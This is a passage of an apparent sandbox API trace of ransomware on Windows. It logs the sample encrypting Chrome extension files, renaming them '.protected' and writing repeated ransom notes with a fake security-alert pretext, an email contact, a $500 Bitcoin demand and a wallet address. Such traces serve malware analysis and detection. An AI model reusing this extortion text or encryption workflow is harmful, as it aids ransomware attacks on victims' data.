SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.157] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.158] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.158] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.158] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.158] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.158] CloseHandle (hObject=0x164) returned 1 [0080.158] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru") returned 141 [0080.159] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0080.159] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*") returned 143 [0080.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.159] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\.") returned 143 [0080.159] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.159] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\..") returned 144 [0080.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.159] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.159] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.159] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.160] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.160] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.160] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.161] CloseHandle (hObject=0x168) returned 1 [0080.161] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected") returned 165 [0080.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0080.162] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.162] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.162] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0080.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.162] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.162] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.163] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.163] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.163] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.163] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.163] CloseHandle (hObject=0x164) returned 1 [0080.163] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0080.163] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk") returned 141 [0080.163] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0080.163] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0080.163] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*") returned 143 [0080.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.164] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\.") returned 143 [0080.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.164] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\..") returned 144 [0080.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.164] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.164] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.164] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.164] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.164] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.165] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0080.166] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0080.166] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.166] CloseHandle (hObject=0x168) returned 1 [0080.166] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected") returned 165 [0080.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0080.167] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.167] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.167] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0080.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.167] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 